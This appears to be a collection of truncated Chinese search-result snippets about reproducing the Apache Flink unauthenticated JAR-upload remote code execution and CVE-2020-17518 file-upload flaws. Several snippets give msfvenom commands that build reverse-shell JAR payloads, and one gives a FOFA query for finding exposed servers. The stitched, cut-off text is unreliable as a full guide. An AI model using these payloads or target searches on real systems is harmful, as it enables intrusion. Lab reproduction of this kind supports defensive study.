一、漏洞危害 Apache Flink Web Dashboard 未授权访问,上传恶意jar导致远程代码命令执行漏洞复现 高危,能远程执行任意命令 二、影响程度 利用fofa搜索本程序,关键词:app="Apache-Flink" ,接近1500台,初步尝试发现命中率较高。 三、漏洞复现 访问出现此页面功能模块,证明可能存在漏洞 3.1 MSF监听 第一步:生成需要上传...
前提:准备好docker环境,下载好vulhub,进入目录 ,开始复现漏洞 docker-compose build //可选 docker-compose up -d 完成试验后,记得删除漏洞环境哦~~ docker-compose down docker system prune -a -f //可选 简单访问一下,说明Apache Flink 文件上传漏洞(CVE-2020-17518)环境搭建成功了 掏出Burpsuite,就是一个...
01 漏洞情况 Apache Flink是由Apache软件基金会开发的开源流处理框架,核心是用Java和Scala编写的分布式流数据流引擎。在Apache Flink中,因存在文件上传API未对文件名进行过滤,恶意攻击者可通过JobManager调用REST API读取系统中任意文件。此外,恶意攻击者还可通过调用REST接口修改HTTP HEADER来进行任意文件上传。02 影响...
Flink下载地址:archive.apache.org/dist 解压tar -zxvf 3. 进入bin目录运行./start-cluster.sh启动环境 4.在浏览器打开,出现以下界面表示安装成功 0x04漏洞复现 1. 首先使用kali生成jar的后门包 msfvenom -p java/meterpreter/reverse_tcp LHOST=IP LPORT=port -f jar > shell.jar 2.使用msfconsole监听shell设...
攻击者可以通过以下步骤利用该漏洞: 准备包含恶意代码的JAR文件 利用Flink Web界面的上传功能上传该文件 触发JAR文件执行,运行恶意代码 获取系统控制权限或执行其他恶意操作 成功利用此漏洞后,攻击者可能获得远程代码执行权限,进而控制整个Flink集群。 潜在危害
Apache Flink***任意文件上传漏洞(CVE-2020-17518) Apache Flink 1.5.1引入了REST处理程序,由于功能上存在缺陷,攻击者可以通过修改HTTP HEADER将恶意文件写入到本地文件系统上的任意位置,并可通过Flink 访问。 影响范围: Apache Flink 1.5.1-1.11.2 复现
近日,有安全研究员公开了一个Apache Flink的任意Jar包上传导致远程代码执行的漏洞. 影响范围:<= 1.9.1(最新版本) 可能是我测的比较少,成功的概率1.9版本比较高。 0x02 漏洞威胁等级 高危 可导致远程代码执行 0x03 漏洞复现 第一步生成payload msfvenom -p java/shell_reverse_tcp LHOST=x.x.x.x LPORT=x ...
如上,当以 post 方式访问到 /v1/jobs 时,会路由到此,简单查看逻辑发现会将我们上传到文件内容进行反序列化操作 鸡肋的反序列化 背景: 已知apache flink 没有后端模板渲染的功能,前端的模板是通过 nodejs 静态编译得到,如果想要以任意文件写入的方式去修改模板文件,需要重新编译并且重启服务器才能 RCE。flink 中虽...
攻击者可以通过以下步骤利用该漏洞: 准备包含恶意代码的JAR文件 利用Flink Web界面的上传功能上传该文件 触发JAR文件执行,运行恶意代码 获取系统控制权限或执行其他恶意操作 成功利用此漏洞后,攻击者可能获得远程代码执行权限,进而控制整个Flink集群。 潜在危害
漏洞级别 高危 影响范围 Apache Flink <=1.9.1 漏洞复现 首先下载Apache Flink 1.9.1安装包并进行解压,之后进入bin文件夹内运行./start-cluster.sh启动环境,浏览器访问http://ip:8081验证是否成功,如下图所示: 接着使用生成jar的木马文件并进行上传,如下图所示: ...